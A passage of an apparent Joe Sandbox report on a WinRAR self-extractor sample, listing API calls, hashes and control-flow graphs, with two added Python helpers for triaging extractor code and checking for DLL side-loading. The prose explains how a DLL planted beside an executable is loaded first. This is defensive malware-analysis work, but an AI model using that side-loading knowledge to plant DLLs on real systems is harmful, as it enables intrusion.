    • Opcode Fuzzy Hash: 8e6d41e37c3d2c9c98cb77a57ec9860436f4ed892d6e273e3cf50136b14bb988
    • Instruction Fuzzy Hash: 9D213975600119EFDB04DF68CC69E5EBBB8EF48705B1140A9FA06E7261CB71AD42CF90
    APIs
    • SetWindowLongW.USER32(?,000000EB), ref: 00CAB098
    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00CAB0B3
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: Window$LongNtdllProc_
    • String ID:
    • API String ID: 2044268144-0
    • Opcode ID: 131acd3674fa1004730ed375f366a6b8d0898b7eb73dfba72a670913548cfe29
    • Instruction ID: 5fcfe0725dada72d0ed87e77acaf9291fab53fcee9e6cada7201f35c2e332e0f
    • Opcode Fuzzy Hash: 131acd3674fa1004730ed375f366a6b8d0898b7eb73dfba72a670913548cfe29
    • Instruction Fuzzy Hash: 67E01A3610011DBBCF119F99DD08D9F3F69EF8A770B00C016FA1996160C771A961EBA1
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 0eab49bf5d0bbce9bb887d6fc13f8fa7c49c5a75d6aaa616284d2eec9f612ebd
    • Instruction ID: 1d92a571c1aa639986ee6f2380a5561950e148fe1f0f17bc8bbe060282f0b342
    • Opcode Fuzzy Hash: 0eab49bf5d0bbce9bb887d6fc13f8fa7c49c5a75d6aaa616284d2eec9f612ebd
    • Instruction Fuzzy Hash: 59D1B471A083428FCB14DF28C88479BBBE1BF8630CF04466DE99997242D734EE49CB56
    APIs
    • __EH_prolog.LIBCMT ref: 00CAC9C5
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CACAB1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CACACF
    • IsDialogMessageW.USER32(?,?), ref: 00CACAE2
    • TranslateMessage.USER32(?), ref: 00CACAF0
    • DispatchMessageW.USER32(?), ref: 00CACAFA
    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CACB1D
    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CACB40
    • GetDlgItem.USER32(?,00000068), ref: 00CACB63
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CACB7E
    • SendMessageW.USER32(00000000,000000C2,00000000,00CC45F4), ref: 00CACB91
      • Part of subcall function 00CAE586: _wcslen.LIBCMT ref: 00CAE5B0
    • SetFocus.USER32(00000000), ref: 00CACB98
    • _swprintf.LIBCMT ref: 00CACBF7
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CACC5A
    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CACC82
    • GetTickCount.KERNEL32 ref: 00CACCA0
    • _swprintf.LIBCMT ref: 00CACCB8
    • GetLastError.KERNEL32(?,00000011), ref: 00CACCEA
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CACD3D
    • _swprintf.LIBCMT ref: 00CACD74
    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00CACDC8
    • GetCommandLineW.KERNEL32 ref: 00CACDDE
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00CE1482,00000400,00000001,00000001), ref: 00CACE35
    • Sleep.KERNEL32(00000064), ref: 00CACEA5
    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00CE1482,00000400), ref: 00CACECE
    • CloseHandle.KERNEL32(00000000), ref: 00CACED7
    • _swprintf.LIBCMT ref: 00CACF0A
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CACF69
    • SetDlgItemTextW.USER32(?,00000065,00CC45F4), ref: 00CACF80
    • GetDlgItem.USER32(?,00000065), ref: 00CACF89
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CACF98
    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CACFA7
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CAD054
    • _wcslen.LIBCMT ref: 00CAD0AA
    • _swprintf.LIBCMT ref: 00CAD0D4
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CAD11E
    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CAD138
    • GetDlgItem.USER32(?,00000068), ref: 00CAD141
    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CAD157
    • GetDlgItem.USER32(?,00000066), ref: 00CAD171
    • SetWindowTextW.USER32(00000000,00CE389A), ref: 00CAD193
    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CAD1F3
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CAD206
    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 00CAD2A9
    • EnableWindow.USER32(00000000,00000000), ref: 00CAD383
    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CAD3C5
      • Part of subcall function 00CAD872: __EH_prolog.LIBCMT ref: 00CAD877
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CAD3E9
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
    • API String ID: 3593385084-1645151803
    • Opcode ID: f94568a09bed862125ae988052d68a24f303ba6c3a4183bd01cd2fe0fef64a85
    • Instruction ID: a118fb6f8880c726a9b9196425e048f43ca6e12912000f1a46a3191af7e54f14
    • Opcode Fuzzy Hash: f94568a09bed862125ae988052d68a24f303ba6c3a4183bd01cd2fe0fef64a85
    • Instruction Fuzzy Hash: E542F870940245BEEF21AB70DC8EFBE77BCAB02708F044155F652A60E2CBB45E45DB62
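    The record above is the self-extractor's main dialog procedure: it creates the named mapping winrarsfxmappingfile.tmp, reads its own command line, and references the STARTDLG and LICENSEDLG dialog resources. Those names, together with RarHtmlClassName, sfxname and sfxstime in the other records, are resource, window-class and environment-variable names of the WinRAR self-extractor module, so every function that carries one of them is stock extractor code rather than attacker code. The following triage helper, added here as an example and not code from Joe Sandbox or WinRAR, parses records in the form shown on this page (the `• API.MODULE(...), ref:` lines and the `• String ID:` line of each function) and separates functions with those markers from the ones still worth reading. The record text is constructed from lines of this report; the SFX_MARKERS set is an assumption drawn from the strings the report shows, not an official WinRAR signature.

```python
"""Triage helper for Joe Sandbox function records of the kind shown in this
report: parse the API and String ID lines of each record and separate the
functions that carry WinRAR self-extractor markers (stub code) from the rest.

Added example, not code from Joe Sandbox or WinRAR.  SAMPLE is constructed
from lines of this report; SFX_MARKERS is an assumption drawn from the strings
the report shows, not an official WinRAR signature.
"""
import re
from dataclasses import dataclass, field

# "• API.MODULE(args), ref: addr", optionally prefixed by "Part of subcall function X:".
API_LINE = re.compile(
    r"^\s*•\s*(Part of subcall function [0-9A-Fa-f]+:\s*)?"   # group 1: subcall prefix
    r"([A-Za-z_][A-Za-z_0-9]*)\.([A-Z_0-9]+)"                  # groups 2/3: API, module
    r"(?:\(.*\))?,?\s*ref:\s*([0-9A-Fa-f]+)")                  # group 4: call site
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(.*)$")
OPCODE_LINE = re.compile(r"^\s*•\s*Opcode ID:\s*([0-9a-f]{64})\s*$")

# Names the report shows inside the extractor's own UI/IPC code (assumption:
# any function using one of them is SFX stub code, not payload).
SFX_MARKERS = {
    "winrarsfxmappingfile.tmp", "STARTDLG", "LICENSEDLG", "RarHtmlClassName",
    "__tmp_rar_sfx_access_check_%u", "sfxname", "sfxstime",
}

@dataclass
class FuncRecord:
    opcode_id: str = ""
    apis: list = field(default_factory=list)      # (api, module, call_site, via_subcall)
    strings: list = field(default_factory=list)

def parse_records(text):
    """One FuncRecord per 'Opcode ID' line; the API and String ID lines that
    precede it belong to that record."""
    records, cur = [], FuncRecord()
    for line in text.splitlines():
        if m := API_LINE.match(line):
            cur.apis.append((m.group(2), m.group(3), m.group(4).upper(), m.group(1) is not None))
        elif m := STRING_ID_LINE.match(line):
            cur.strings = [s for s in m.group(1).split("$") if s]   # "$" separates strings
        elif m := OPCODE_LINE.match(line):
            cur.opcode_id = m.group(1)
            records.append(cur)
            cur = FuncRecord()
    return records

def sfx_markers(rec):
    """Extractor marker strings found in the record, sorted."""
    return sorted(SFX_MARKERS.intersection(rec.strings))

def direct_apis(rec):
    """APIs the function calls itself (subcall entries excluded), de-duplicated."""
    return sorted({api for api, _, _, sub in rec.apis if not sub})

def triage(records):
    """Map opcode id -> verdict: 'sfx-stub' when a marker is present, else 'review'."""
    out = {}
    for r in records:
        markers = sfx_markers(r)
        out[r.opcode_id] = {"verdict": "sfx-stub" if markers else "review",
                            "markers": markers, "apis": direct_apis(r)}
    return out

# Constructed from three records on this page (a subset of their lines).
SAMPLE = """\
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00CACDC8
• GetCommandLineW.KERNEL32 ref: 00CACDDE
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00CE1482,00000400,00000001,00000001), ref: 00CACE35
• DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 00CAD2A9
  • Part of subcall function 00CAD872: __EH_prolog.LIBCMT ref: 00CAD877
• String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
• Opcode ID: f94568a09bed862125ae988052d68a24f303ba6c3a4183bd01cd2fe0fef64a85
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BABD
  • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
• FindNextFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BB21
• GetLastError.KERNEL32(?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BB2D
• String ID:
• Opcode ID: 1d1340db3ae845a8c06968258ad4e0715aac99677d7813e54f06861089ded004
• GetCurrentProcess.KERNEL32(00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002,00000000), ref: 00CB91C1
• TerminateProcess.KERNEL32(00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002,00000000), ref: 00CB91C8
• ExitProcess.KERNEL32 ref: 00CB91DA
• String ID:
• Opcode ID: 6c8850bfba9347372e3e0e956877e95a0e70e612ba65f0f816a43da45af5e0b3
"""

if __name__ == "__main__":
    for opcode_id, verdict in triage(parse_records(SAMPLE)).items():
        print(opcode_id[:16], verdict["verdict"], verdict["markers"], verdict["apis"])
```

    The verdict rests only on the strings the report itself lists; the two marker-free records (directory enumeration, process termination) are CRT and extractor plumbing too, but the helper leaves them as `review` rather than guess, which is the point of keeping the marker list small and explicit.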

    Control-flow Graph (text export: each node is a basic-block address range followed by the APIs it calls, `a->b` is an edge; the executed / not-executed colouring of the rendered graph is not preserved)
    control_flow_graph 274 ca1b7c-ca1b9f call caffc0 GetModuleHandleW 277 ca1c00-ca1e61 274->277 278 ca1ba1-ca1bb8 GetProcAddress 274->278 279 ca1f2d-ca1f59 GetModuleFileNameW call c9d6a7 call ca1928 277->279 280 ca1e67-ca1e72 call cb89de 277->280 281 ca1bba-ca1bd0 278->281 282 ca1bd2-ca1be2 GetProcAddress 278->282 297 ca1f5b-ca1f67 call c9c619 279->297 280->279 292 ca1e78-ca1ea6 GetModuleFileNameW CreateFileW 280->292 281->282 285 ca1bfe 282->285 286 ca1be4-ca1bf9 282->286 285->277 286->285 294 ca1ea8-ca1eb4 SetFilePointer 292->294 295 ca1f21-ca1f28 CloseHandle 292->295 294->295 298 ca1eb6-ca1ed2 ReadFile 294->298 295->279 304 ca1f69-ca1f74 call ca1b34 297->304 305 ca1f96-ca1fbd call c9d71d GetFileAttributesW 297->305 298->295 300 ca1ed4-ca1ef9 298->300 302 ca1f16-ca1f1f call ca1697 300->302 302->295 310 ca1efb-ca1f15 call ca1b34 302->310 304->305 315 ca1f76-ca1f94 CompareStringW 304->315 312 ca1fbf-ca1fc3 305->312 313 ca1fc7 305->313 310->302 312->297 316 ca1fc5 312->316 317 ca1fc9-ca1fce 313->317 315->305 315->312 316->317 319 ca1fd0 317->319 320 ca2005-ca2007 317->320 321 ca1fd2-ca1ff9 call c9d71d GetFileAttributesW 319->321 322 ca200d-ca2024 call c9d6f1 call c9c619 320->322 323 ca2114-ca211e 320->323 329 ca1ffb-ca1fff 321->329 330 ca2003 321->330 333 ca208c-ca20bf call c94a20 AllocConsole 322->333 334 ca2026-ca2087 call ca1b34 * 2 call c9f937 call c94a20 call c9f937 call cab7e4 322->334 329->321 332 ca2001 329->332 330->320 332->320 339 ca210c-ca210e ExitProcess 333->339 340 ca20c1-ca2106 GetCurrentProcessId AttachConsole call cb4f93 GetStdHandle WriteConsoleW Sleep FreeConsole 333->340 334->339 340->339
    APIs
    • GetModuleHandleW.KERNEL32(kernel32), ref: 00CA1B95
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA1BA7
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA1BD8
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CA1E82
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA1E9C
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CA1EAC
    • ReadFile.KERNEL32(00000000,?,00007FFE,00CC4D24,00000000), ref: 00CA1ECA
    • CloseHandle.KERNEL32(00000000), ref: 00CA1F22
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CA1F37
    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CC4D24,?,00000000,?,00000800), ref: 00CA1F8B
    • GetFileAttributesW.KERNEL32(?,?,00CC4D24,00000800,?,00000000,?,00000800), ref: 00CA1FB5
    • GetFileAttributesW.KERNEL32(?,?,00CC4DEC,00000800), ref: 00CA1FF1
      • Part of subcall function 00CA1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
      • Part of subcall function 00CA1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    • _swprintf.LIBCMT ref: 00CA2063
    • _swprintf.LIBCMT ref: 00CA20AF
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • AllocConsole.KERNEL32 ref: 00CA20B7
    • GetCurrentProcessId.KERNEL32 ref: 00CA20C1
    • AttachConsole.KERNEL32(00000000), ref: 00CA20C8
    • _wcslen.LIBCMT ref: 00CA20DD
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CA20EE
    • WriteConsoleW.KERNEL32(00000000), ref: 00CA20F5
    • Sleep.KERNEL32(00002710), ref: 00CA2100
    • FreeConsole.KERNEL32 ref: 00CA2106
    • ExitProcess.KERNEL32 ref: 00CA210E
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
    • API String ID: 1207345701-3298887752
    • Opcode ID: 3cbbed0c9f95946f22fb438155077767476a423f3fedd3edad3e3703f1efac63
    • Instruction ID: 75cd1bf010df09c4c7ac2df7dcda87687a28ad5c4d01267d546b703af9a43441
    • Opcode Fuzzy Hash: 3cbbed0c9f95946f22fb438155077767476a423f3fedd3edad3e3703f1efac63
    • Instruction Fuzzy Hash: 69D18DF10483859FDB349F90D858F9FBBE8FB85308F45891DF69996140CBB09549CBA2
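    The record above is the extractor's start-up hardening against DLL side-loading. It resolves SetDllDirectoryW and SetDefaultDllDirectories from kernel32 with GetProcAddress (they are looked up at run time because older Windows builds lack them), takes its own path with GetModuleFileNameW, compares file names against DXGIDebug.dll with a case-insensitive CompareStringW (flags 0x1001 = NORM_IGNORECASE | SORT_STRINGSORT), probes dwmapi.dll and uxtheme.dll with GetFileAttributesW, and, if one of them sits in its own folder, opens a console, prints "Please remove %s from %s folder. It is unsecure to run %s until it is done.", sleeps 10 seconds (0x2710 ms) and calls ExitProcess. The reason is the loader's search order: a DLL that is not on the KnownDLLs list is resolved from the application directory before System32, so a planted copy next to the executable would be loaded in its place. The following script, added here as an example and not WinRAR's or Joe Sandbox's code, models that decision offline and generalises it into the check an analyst runs over an extraction directory of dropped files. Assumptions: the three DLL names are the ones visible in the record; the argument order of the warning format string, the generic `sample.exe` path and the directory listings are constructed.

```python
"""Offline model of the DLL side-loading guard shown in the record above, plus
a generalised triage check for any directory of dropped files.

Added example, not WinRAR's or Joe Sandbox's code.  Assumptions: WATCHED_DLLS
holds the three names visible in the record; the %s order of WARNING_FMT and
all paths and listings below are constructed for illustration.
"""
import ntpath

# DLL names the record shows the stub looking for beside its own image.
WATCHED_DLLS = ("DXGIDebug.dll", "dwmapi.dll", "uxtheme.dll")
# Format string from the record; argument order (dll, folder, program) is assumed.
WARNING_FMT = ("Please remove %s from %s folder. "
               "It is unsecure to run %s until it is done.")

def sideload_candidates(dir_listing, watched=WATCHED_DLLS):
    """Watched DLL names present in a directory listing.  Case-insensitive,
    like the CompareStringW call (0x1001 = NORM_IGNORECASE | SORT_STRINGSORT)."""
    present = {name.lower(): name for name in dir_listing}
    return [present[w.lower()] for w in watched if w.lower() in present]

def guard(exe_path, dir_listing, watched=WATCHED_DLLS):
    """(should_run, message): clean directory -> (True, None); a hit -> the
    console message the stub prints before ExitProcess."""
    hits = sideload_candidates(dir_listing, watched)
    if not hits:
        return True, None
    exe_dir, exe_name = ntpath.split(exe_path)   # GetModuleFileNameW, split into folder/name
    return False, WARNING_FMT % (hits[0], exe_dir, exe_name)

def exes_with_sidecar_dlls(paths):
    """Generalisation for triage: map every .exe in a file list to the .dll
    files in the same directory.  Any such pair is a side-loading opportunity
    if the exe (or a library it pulls in) loads that DLL by bare name."""
    by_dir = {}
    for p in paths:
        d, n = ntpath.split(p)
        by_dir.setdefault(d.lower(), (d, []))[1].append(n)
    result = {}
    for d, names in by_dir.values():
        dlls = sorted((n for n in names if n.lower().endswith(".dll")), key=str.lower)
        for n in names:
            if n.lower().endswith(".exe") and dlls:
                result[ntpath.join(d, n)] = dlls
    return result

if __name__ == "__main__":
    listing = ["sample.exe", "UXTHEME.DLL", "readme.txt"]          # constructed
    print(guard(r"C:\Users\user\Desktop\sample.exe", listing))
    dropped = [r"C:\drop\viewer.exe", r"C:\drop\dwmapi.dll",        # constructed
               r"C:\drop\readme.txt", r"C:\other\tool.exe"]
    print(exes_with_sidecar_dlls(dropped))
```

    The name check is a stop-gap for libraries such as uxtheme.dll and dwmapi.dll that common-control initialisation may already have loaded before SetDefaultDllDirectories can take effect; the API call is the durable fix, the file check covers the window before it.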
    APIs
    • __EH_prolog.LIBCMT ref: 00C9ED90
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C9EDCC
      • Part of subcall function 00C9D6A7: _wcslen.LIBCMT ref: 00C9D6AF
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00CA2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C9CF18,00000000,?,?), ref: 00CA2EDE
    • _wcslen.LIBCMT ref: 00C9F109
    • __fprintf_l.LIBCMT ref: 00C9F23C
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
    • API String ID: 566448164-801612888
    • Opcode ID: 36cda248438d21e91389aa26749b7e1a9f59e5d976ea060d9b700b568e6d55de
    • Instruction ID: 888bde6ab5c0666976f92c6382db088853b74ae5f03c2091fa0c25186a546bb3
    • Opcode Fuzzy Hash: 36cda248438d21e91389aa26749b7e1a9f59e5d976ea060d9b700b568e6d55de
    • Instruction Fuzzy Hash: C632CD71900219EBCF24EF68C849BEE37A8BF14704F44456EF916D7291EB719E86CB90

    Control-flow Graph (text export: each node is a basic-block address range followed by the APIs it calls, `a->b` is an edge; the executed / not-executed colouring of the rendered graph is not preserved)
    control_flow_graph 658 caaee5-caaf13 ShowWindow call caac14 661 caaf1e-caaf23 658->661 662 caaf15-caaf1d call cb5209 658->662 664 caaf29-caaf32 call cb8a08 661->664 665 caaf25-caaf27 661->665 662->661 667 caaf33-caaf3b 664->667 665->667 670 caaf3d-caaf3f 667->670 671 caaf41-caaf4a call cb8a08 667->671 672 caaf4b-caaf75 GetWindowRect GetParent MapWindowPoints 670->672 671->672 675 caaf80-caafc9 GetParent CreateWindowExW 672->675 676 caaf77-caaf7a DestroyWindow 672->676 677 caafcb-caafce 675->677 678 cab008-cab00a 675->678 676->675 677->678 681 caafd0-caafd2 677->681 679 cab01e-cab024 678->679 680 cab00c-cab018 ShowWindow UpdateWindow 678->680 680->679 681->679 682 caafd4-caafd7 681->682 682->679 683 caafd9-caafdc 682->683 683->679 684 caafde-caafec call caad0e 683->684 684->679 687 caafee-cab006 ShowWindow SetWindowTextW call cb5209 684->687 687->679
    APIs
    • ShowWindow.USER32(?,00000000), ref: 00CAAEFE
      • Part of subcall function 00CAAC14: LoadCursorW.USER32(00000000,00007F00), ref: 00CAAC4B
      • Part of subcall function 00CAAC14: RegisterClassExW.USER32(00000030), ref: 00CAAC6C
    • GetWindowRect.USER32(?,?), ref: 00CAAF54
    • GetParent.USER32(?), ref: 00CAAF62
    • MapWindowPoints.USER32(00000000,00000000), ref: 00CAAF6B
    • DestroyWindow.USER32(00000000), ref: 00CAAF7A
    • GetParent.USER32(?), ref: 00CAAF97
    • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 00CAAFBB
    • ShowWindow.USER32(?,00000005,00000000), ref: 00CAAFF1
    • SetWindowTextW.USER32(?,00000000), ref: 00CAAFF9
    • ShowWindow.USER32(00000000,00000005), ref: 00CAB00F
    • UpdateWindow.USER32(00000000), ref: 00CAB018
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
    • String ID: RarHtmlClassName
    • API String ID: 3841971108-1658105358
    • Opcode ID: 3ca97fcf66f7529db516a1d511e70f334c1e0dfcc0b23552d90c65a93f7e4594
    • Instruction ID: a9b3cdc5726b7f83d2c985dcb880bd797f9732ca15b0dfc184a958ee94db276e
    • Opcode Fuzzy Hash: 3ca97fcf66f7529db516a1d511e70f334c1e0dfcc0b23552d90c65a93f7e4594
    • Instruction Fuzzy Hash: 3141E271004205AFDB219F60DC49B6F7FA8FF09309F148659FA5A99052DB30ED04DB66

    Control-flow Graph (rendered in the original report; not reproduced here)

    APIs
      • Part of subcall function 00CAC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
      • Part of subcall function 00CAC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
      • Part of subcall function 00CAC748: IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
      • Part of subcall function 00CAC748: TranslateMessage.USER32(?), ref: 00CAC78C
      • Part of subcall function 00CAC748: DispatchMessageW.USER32(?), ref: 00CAC796
    • GetDlgItem.USER32(00000068,00CF1CF0), ref: 00CAE61B
    • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,00CAC999,00CC60F0,00CF1CF0,00CF1CF0,00001000,?,00000000,?), ref: 00CAE643
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CAE64E
    • SendMessageW.USER32(00000000,000000C2,00000000,00CC45F4), ref: 00CAE65C
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CAE672
    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CAE68C
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CAE6D0
    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CAE6DE
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CAE6ED
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CAE714
    • SendMessageW.USER32(00000000,000000C2,00000000,00CC549C), ref: 00CAE723
      • Part of subcall function 00CAA235: DestroyWindow.USER32(?,00000000,00CAE640,?,?,00000001,?,?,00CAC999,00CC60F0,00CF1CF0,00CF1CF0,00001000,?,00000000,?), ref: 00CAA241
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
    • String ID: \
    • API String ID: 3039329835-2967466578
    • Opcode ID: 5d6a841e0aa5be34b02b04eb9ef21195277466c4cbc92325c0c85a6067dfd244
    • Instruction ID: 2347d2a8cc092757affcc7db19354b364996d281b90e2378d2126cb62c42fdca
    • Opcode Fuzzy Hash: 5d6a841e0aa5be34b02b04eb9ef21195277466c4cbc92325c0c85a6067dfd244
    • Instruction Fuzzy Hash: 4931AD71145B41ABE301DF20AC4AFAF3FACEB82704F004919F7A1961A0C7656A04CBA7

    Control-flow Graph (rendered in the original report with an Executed / Not Executed legend; not reproduced here. Basic blocks 0xCBBB0B to 0xCBBD26: two MultiByteToWideChar calls, then WideCharToMultiByte, with __freea on each exit path.)
    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CB6993,00CB6993,?,?,?,00CBBD5C,00000001,00000001,62E85006), ref: 00CBBB65
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CBBD5C,00000001,00000001,62E85006,?,?,?), ref: 00CBBBEB
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CBBCE5
    • __freea.LIBCMT ref: 00CBBCF2
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    • __freea.LIBCMT ref: 00CBBCFB
    • __freea.LIBCMT ref: 00CBBD20
    Memory Dump Source
